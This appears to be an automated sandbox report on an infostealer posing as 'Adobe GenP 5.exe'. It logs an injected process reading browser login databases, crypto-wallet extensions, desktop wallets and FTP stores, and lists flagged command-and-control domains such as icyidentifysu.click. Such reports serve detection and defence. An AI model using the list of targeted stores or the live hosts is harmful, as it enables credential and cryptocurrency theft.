            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
            Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 5448, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 5448, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation
            1
            DLL Side-Loading
            311
            Process Injection
            11
            Virtualization/Sandbox Evasion
            2
            OS Credential Dumping
            121
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            311
            Process Injection
            LSASS Memory11
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol41
            Data from Local System
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell
            Logon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared Drive113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
            Obfuscated Files or Information
            NTDS1
            File and Directory Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets22
            System Information Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Adobe GenP 5.exe38%VirustotalBrowse
            Adobe GenP 5.exe45%ReversingLabsWin32.Trojan.Generic
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://icyidentifysu.click/100%Avira URL Cloudmalware
            https://icyidentifysu.click/8Nr100%Avira URL Cloudmalware
            https://icyidentifysu.click/ck/8Nr100%Avira URL Cloudmalware
            https://icyidentifysu.click/nF100%Avira URL Cloudmalware
            https://icyidentifysu.click/YF100%Avira URL Cloudmalware
            https://icyidentifysu.click/piv100%Avira URL Cloudmalware
            https://icyidentifysu.click/pi100%Avira URL Cloudmalware
            https://icyidentifysu.click:443/api100%Avira URL Cloudmalware
            icyidentifysu.click100%Avira URL Cloudmalware
            https://icyidentifysu.click/api100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            icyidentifysu.click
            104.21.29.252
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              necklacebudi.latfalse
                high
                https://icyidentifysu.click/apitrue
                • Avira URL Cloud: malware
                unknown
                aspecteirs.latfalse
                  high
                  energyaffai.latfalse
                    high
                    sustainskelet.latfalse
                      high
                      crosshuaht.latfalse
                        high
                        rapeflowwj.latfalse
                          high
                          grannyejh.latfalse
                            high
                            discokeyus.latfalse
                              high
                              icyidentifysu.clicktrue
                              • Avira URL Cloud: malware
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoBitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/zloirock/core-jsAdobe GenP 5.exefalse
                                      high
                                      https://icyidentifysu.click/BitLockerToGo.exe, 00000003.00000003.2609531929.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609625535.000000000356A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610591925.000000000356B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610702949.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609550259.0000000003568000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609186607.00000000035D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://icyidentifysu.click/piBitLockerToGo.exe, 00000003.00000003.2609531929.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610702949.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609186607.00000000035D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiBitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://icyidentifysu.click/8NrBitLockerToGo.exe, 00000003.00000003.2476797050.0000000003574000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://icyidentifysu.click/pivBitLockerToGo.exe, 00000003.00000003.2609531929.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609186607.00000000035D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaBitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ac.ecosia.org/autocomplete?q=BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgBitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.microBitLockerToGo.exe, 00000003.00000003.2476797050.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2517419497.0000000003574000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgBitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://icyidentifysu.click/ck/8NrBitLockerToGo.exe, 00000003.00000003.2609625535.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610591925.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2517419497.0000000003574000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                http://x1.c.lencr.org/0BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://x1.i.lencr.org/0BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
